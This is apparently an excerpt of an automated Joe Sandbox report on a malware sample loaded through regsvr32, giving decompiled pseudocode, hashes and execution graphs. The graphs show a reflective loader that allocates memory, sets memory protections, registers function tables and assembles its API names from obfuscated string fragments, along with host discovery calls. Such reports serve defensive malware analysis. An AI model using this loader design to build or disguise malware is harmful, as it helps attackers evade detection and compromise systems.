                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConsoleErrorLastMode
                                                                                                          • String ID:
                                                                                                          • API String ID: 953036326-0
                                                                                                          • Opcode ID: 0675eeeead42596f3d7dd2e4aa0abe962e21f79f71d61d7b844ad93efeec3d3b
                                                                                                          • Instruction ID: 0d257abc0b638f0f040665fb3b769d735b9bc0d803a768daaeded027fae08968
                                                                                                          • Opcode Fuzzy Hash: 0675eeeead42596f3d7dd2e4aa0abe962e21f79f71d61d7b844ad93efeec3d3b
                                                                                                          • Instruction Fuzzy Hash: 7291B13261469885F7A2CF6598403ED3BA0F749BC8F14C11AFE4A67A95DF74C68AC710
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 29%
                                                                                                          			E0000000118000DC50(signed int __edx, void* __edi, void* __rax, signed long long __rbx, intOrPtr* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed int _a5176, void* _a5192) {
                                                                                                          				intOrPtr _v0;
                                                                                                          				signed long long _v8;
                                                                                                          				signed int _t41;
                                                                                                          				signed long long _t62;
                                                                                                          				short* _t67;
                                                                                                          				signed int* _t68;
                                                                                                          				void* _t91;
                                                                                                          				void* _t97;
                                                                                                          				void* _t99;
                                                                                                          				void* _t102;
                                                                                                          				void* _t103;
                                                                                                          
                                                                                                          				_a8 = __rbx;
                                                                                                          				_a24 = __rbp;
                                                                                                          				E0000000118000F880(0x1470, __rax, _t97, _t99);
                                                                                                          				_t62 =  *0x80021010; // 0x268a0197523d
                                                                                                          				_a5176 = _t62 ^ _t91 - __rax;
                                                                                                          				r14d = r9d;
                                                                                                          				r10d = r10d & 0x0000003f;
                                                                                                          				_t103 = _t102 + __r8;
                                                                                                          				 *((long long*)(__rcx)) =  *((intOrPtr*)(0x800227f0 + (__edx >> 6) * 8));
                                                                                                          				 *((intOrPtr*)(__rcx + 8)) = 0;
                                                                                                          				if (__r8 - _t103 >= 0) goto 0x8000dd91;
                                                                                                          				_t67 =  &_a40;
                                                                                                          				if (__r8 - _t103 >= 0) goto 0x8000dcfa;
                                                                                                          				_t41 =  *__r8 & 0x0000ffff;
                                                                                                          				if (_t41 != 0xa) goto 0x8000dce6;
                                                                                                          				 *_t67 = 0xd;
                                                                                                          				_t68 = _t67 + 2;
                                                                                                          				 *_t68 = _t41;
                                                                                                          				if ( &(_t68[0]) -  &_a1744 < 0) goto 0x8000dcc8;
                                                                                                          				_a16 = _a16 & 0x00000000;
                                                                                                          				_a8 = _a8 & 0x00000000;
                                                                                                          				_v0 = 0xd55;
                                                                                                          				_v8 =  &_a1752;
                                                                                                          				r9d = 0;
                                                                                                          				E0000000118000A154();
                                                                                                          				if (0 == 0) goto 0x8000dd89;
                                                                                                          				if (0 == 0) goto 0x8000dd79;
                                                                                                          				_v8 = _v8 & 0x00000000;
                                                                                                          				r8d = 0;
                                                                                                          				r8d = r8d;
                                                                                                          				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000dd89;
                                                                                                          				if (0 + _a24 < 0) goto 0x8000dd46;
                                                                                                          				 *((intOrPtr*)(__rcx + 4)) = __edi - r15d;
                                                                                                          				goto 0x8000dcbd;
                                                                                                          				 *((intOrPtr*)(__rcx)) = GetLastError();
                                                                                                          				return E000000011800010B0(_t39, 0, _a5176 ^ _t91 - __rax);
                                                                                                          			}














                                                                                                          0x18000dc50
                                                                                                          0x18000dc55
                                                                                                          0x18000dc67
                                                                                                          0x18000dc6f
                                                                                                          0x18000dc79
                                                                                                          0x18000dc8a
                                                                                                          0x18000dc98
                                                                                                          0x18000dc9c
                                                                                                          0x18000dcb4
                                                                                                          0x18000dcba
                                                                                                          0x18000dcbd
                                                                                                          0x18000dcc3
                                                                                                          0x18000dccb
                                                                                                          0x18000dccd
                                                                                                          0x18000dcd8
                                                                                                          0x18000dcdf
                                                                                                          0x18000dce2
                                                                                                          0x18000dce6
                                                                                                          0x18000dcf8
                                                                                                          0x18000dcfa
                                                                                                          0x18000dd05
                                                                                                          0x18000dd13
                                                                                                          0x18000dd26
                                                                                                          0x18000dd2b
                                                                                                          0x18000dd35
                                                                                                          0x18000dd3e
                                                                                                          0x18000dd44
                                                                                                          0x18000dd46
                                                                                                          0x18000dd5b
                                                                                                          0x18000dd64
                                                                                                          0x18000dd6f
                                                                                                          0x18000dd77
                                                                                                          0x18000dd7e
                                                                                                          0x18000dd84
                                                                                                          0x18000dd8f
                                                                                                          0x18000ddbf

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                          • String ID: U
                                                                                                          • API String ID: 442123175-4171548499
                                                                                                          • Opcode ID: bcf7ee1ea3ec2a9cc3b1d78a5d2c7ec9e62fd3dc134ebc80f67064554232c18b
                                                                                                          • Instruction ID: c34ad0e7ff2d66e96fda8e7ac49a4eca9b2c2d7f4ff30b46897494357c1f583c
                                                                                                          • Opcode Fuzzy Hash: bcf7ee1ea3ec2a9cc3b1d78a5d2c7ec9e62fd3dc134ebc80f67064554232c18b
                                                                                                          • Instruction Fuzzy Hash: E441A472614A8886EBA2CF25E4447EA7761F79C7D4F408022EE4E87758DF7CC645C750
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFileHeaderRaise
                                                                                                          • String ID: csm
                                                                                                          • API String ID: 2573137834-1018135373
                                                                                                          • Opcode ID: 43dc2e1a8b3bf6a6ca3c7988f27fb1d1dbaf565cf4dd9104b15b21490a7c12b7
                                                                                                          • Instruction ID: 9822ff17b0ce5fbc637df8732c669b6e85e1acb8a855211156653d926a5084e0
                                                                                                          • Opcode Fuzzy Hash: 43dc2e1a8b3bf6a6ca3c7988f27fb1d1dbaf565cf4dd9104b15b21490a7c12b7
                                                                                                          • Instruction Fuzzy Hash: 8D114C72614B4482EBA28F25F440399B7A0F788BD4F188220EE8C0B769DF38CA55CB04
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.435175242.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.435170036.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435186833.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435222239.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.435229461.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassCursorLoadRegister
                                                                                                          • String ID: P
                                                                                                          • API String ID: 1693014935-3110715001
                                                                                                          • Opcode ID: 24b0b9f3c1b09ae8b28d8b77cab2a0cc8b6b471604828e0fcca638cf8f3030e2
                                                                                                          • Instruction ID: c953b54a92ac3cc4e92e902e3110dd604cc2aeb839ef1ea803bcd24b7a7bdda6
                                                                                                          • Opcode Fuzzy Hash: 24b0b9f3c1b09ae8b28d8b77cab2a0cc8b6b471604828e0fcca638cf8f3030e2
                                                                                                          • Instruction Fuzzy Hash: 8501B232519F8486E7A18F00F89834BB7B4F388788F604119E6CD42B68DFBDC258CB40
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:16.4%
                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                          Signature Coverage:0%
                                                                                                          Total number of Nodes:42
                                                                                                          Total number of Limit Nodes:4
                                                                                                          execution_graph 3069 2a5a7f0 3070 2a5a80b 3069->3070 3072 2a5a8bc 3070->3072 3073 2a6020c 3070->3073 3076 2a6022b 3073->3076 3075 2a60590 3075->3072 3076->3075 3077 2a6e310 3076->3077 3079 2a6e423 3077->3079 3078 2a6e5f6 3078->3076 3079->3078 3081 2a540a0 3079->3081 3082 2a54116 3081->3082 3083 2a541ca GetVolumeInformationW 3082->3083 3083->3078 3084 2a72ab0 3085 2a72aea 3084->3085 3086 2a72c51 3085->3086 3088 2a6e9e8 3085->3088 3089 2a58bc8 Process32FirstW 3088->3089 3090 2a6eab4 3089->3090 3090->3085 3095 2a580cc 3096 2a580f3 3095->3096 3097 2a582ba 3096->3097 3098 2a6e9e8 Process32FirstW 3096->3098 3098->3096 3091 2a7488c 3093 2a748d6 3091->3093 3092 2a6e9e8 Process32FirstW 3092->3093 3093->3092 3094 2a74914 3093->3094 3052 2a6e9e8 3055 2a58bc8 3052->3055 3054 2a6eab4 3057 2a58c02 3055->3057 3056 2a58eb8 3056->3054 3057->3056 3058 2a58d6f Process32FirstW 3057->3058 3058->3057 3059 10f0000 3063 10f015a 3059->3063 3060 10f08eb 3061 10f033f GetNativeSystemInfo 3061->3060 3062 10f0377 VirtualAlloc 3061->3062 3064 10f0395 VirtualAlloc 3062->3064 3068 10f03aa 3062->3068 3063->3060 3063->3061 3064->3068 3065 10f0873 3065->3060 3066 10f08c6 RtlAddFunctionTable 3065->3066 3066->3060 3067 10f084b VirtualProtect 3067->3068 3068->3065 3068->3067

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 0 10f0000-10f029a call 10f091c * 2 13 10f0905 0->13 14 10f02a0-10f02a4 0->14 15 10f0907-10f091a 13->15 14->13 16 10f02aa-10f02ae 14->16 16->13 17 10f02b4-10f02b8 16->17 17->13 18 10f02be-10f02c5 17->18 18->13 19 10f02cb-10f02dc 18->19 19->13 20 10f02e2-10f02eb 19->20 20->13 21 10f02f1-10f02fc 20->21 21->13 22 10f0302-10f0312 21->22 23 10f033f-10f0371 GetNativeSystemInfo 22->23 24 10f0314-10f031a 22->24 23->13 26 10f0377-10f0393 VirtualAlloc 23->26 25 10f031c-10f0324 24->25 27 10f032c-10f032d 25->27 28 10f0326-10f032a 25->28 29 10f03aa-10f03ae 26->29 30 10f0395-10f03a8 VirtualAlloc 26->30 31 10f032f-10f033d 27->31 28->31 32 10f03dc-10f03e3 29->32 33 10f03b0-10f03c2 29->33 30->29 31->23 31->25 34 10f03fb-10f0417 32->34 35 10f03e5-10f03f9 32->35 36 10f03d4-10f03d8 33->36 37 10f0419-10f041a 34->37 38 10f0458-10f0465 34->38 35->34 35->35 39 10f03da 36->39 40 10f03c4-10f03d1 36->40 41 10f041c-10f0422 37->41 42 10f046b-10f0472 38->42 43 10f0537-10f0542 38->43 39->34 40->36 44 10f0448-10f0456 41->44 45 10f0424-10f0446 41->45 42->43 48 10f0478-10f0485 42->48 46 10f0548-10f0559 43->46 47 10f06e6-10f06ed 43->47 44->38 44->41 45->44 45->45 49 10f0562-10f0565 46->49 51 10f07ac-10f07c3 47->51 52 10f06f3-10f0707 47->52 48->43 50 10f048b-10f048f 48->50 53 10f055b-10f055f 49->53 54 10f0567-10f0574 49->54 55 10f051b-10f0525 50->55 58 10f087a-10f088d 51->58 59 10f07c9-10f07cd 51->59 56 10f070d 52->56 57 10f07a9-10f07aa 52->57 53->49 62 10f060d-10f0619 54->62 63 10f057a-10f057d 54->63 60 10f052b-10f0531 55->60 61 10f0494-10f04a8 55->61 64 10f0712-10f0736 56->64 57->51 83 10f088f-10f089a 58->83 84 10f08b3-10f08ba 58->84 65 10f07d0-10f07d3 59->65 60->43 60->50 68 10f04cf-10f04d3 61->68 69 10f04aa-10f04cd 61->69 66 10f061f 62->66 67 10f06e2-10f06e3 62->67 63->62 70 10f0583-10f059b 63->70 95 10f0738-10f073e 64->95 96 10f0796-10f079f 64->96 72 10f085f-10f086d 65->72 73 10f07d9-10f07e9 65->73 76 10f0625-10f0648 66->76 67->47 79 10f04d5-10f04e1 68->79 80 10f04e3-10f04e7 68->80 78 10f0518-10f0519 69->78 70->62 81 10f059d-10f059e 70->81 72->65 77 10f0873-10f0874 72->77 74 10f080d-10f080f 73->74 75 10f07eb-10f07ed 73->75 87 10f0822-10f082b 74->87 88 10f0811-10f0820 74->88 85 10f07ef-10f07f9 75->85 86 10f07fb-10f080b 75->86 110 10f064a-10f064b 76->110 111 10f06b2-10f06b7 76->111 77->58 78->55 91 10f0511-10f0515 79->91 93 10f04fe-10f0502 80->93 94 10f04e9-10f04fc 80->94 92 10f05a0-10f0605 81->92 97 10f08ab-10f08b1 83->97 89 10f08bc-10f08c4 84->89 90 10f08eb-10f0903 84->90 99 10f082e-10f083d 85->99 86->99 87->99 88->99 89->90 105 10f08c6-10f08e9 RtlAddFunctionTable 89->105 90->15 91->78 92->92 100 10f0607 92->100 93->78 98 10f0504-10f050e 93->98 94->91 101 10f0748-10f0754 95->101 102 10f0740-10f0746 95->102 96->64 106 10f07a5-10f07a6 96->106 97->84 103 10f089c-10f08a8 97->103 98->91 112 10f083f-10f0845 99->112 113 10f084b-10f085c VirtualProtect 99->113 100->62 108 10f0756-10f0757 101->108 109 10f0764-10f0776 101->109 107 10f077b-10f078d 102->107 103->97 105->90 106->57 107->96 126 10f078f-10f0794 107->126 118 10f0759-10f0762 108->118 109->107 119 10f064e-10f0651 110->119 115 10f06ce-10f06d8 111->115 116 10f06b9-10f06bd 111->116 112->113 113->72 115->76 121 10f06de-10f06df 115->121 116->115 120 10f06bf-10f06c3 116->120 118->109 118->118 123 10f065b-10f0666 119->123 124 10f0653-10f0659 119->124 120->115 125 10f06c5 120->125 121->67 128 10f0668-10f0669 123->128 129 10f0676-10f0688 123->129 127 10f068d-10f06a3 124->127 125->115 126->95 132 10f06ac 127->132 133 10f06a5-10f06aa 127->133 130 10f066b-10f0674 128->130 129->127 130->129 130->130 132->111 133->119
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.617605373.00000000010F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_10f0000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                          • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
                                                                                                          • API String ID: 394283112-3605381585
                                                                                                          • Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                          • Instruction ID: df97905b61fa121674ba3bc448e3c3da250c1dd0464f84e44f84255640b0e1b8
                                                                                                          • Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                          • Instruction Fuzzy Hash: 48522530618B088BD719DF18C8867BAB7E2FB84304F14466DE9CBC7616DB34E442CB86
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 305 2a540a0-2a54136 call 2a69f38 308 2a5413c-2a541c4 call 2a5a940 305->308 309 2a541ca-2a54202 GetVolumeInformationW 305->309 308->309
                                                                                                          APIs
                                                                                                          • GetVolumeInformationW.KERNELBASE ref: 02A541EB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.617991497.0000000002A51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A51000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_2a51000_regsvr32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: InformationVolume
                                                                                                          • String ID: Ql$v[
                                                                                                          • API String ID: 2039140958-138011117
                                                                                                          • Opcode ID: 3a0f33469602c5b2414fed7c4f525ce4c0e953e4a15951e85aa6350d2a5935a1
                                                                                                          • Instruction ID: b02806e806e460c2a89faba87cf606af3544540a93496ae9260b8aba043b811f
                                                                                                          • Opcode Fuzzy Hash: 3a0f33469602c5b2414fed7c4f525ce4c0e953e4a15951e85aa6350d2a5935a1
                                                                                                          • Instruction Fuzzy Hash: FE313B7051C7848BD7B8DF18D48579AB7E1FB88315F60895DE88CC7295CF789888CB82
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%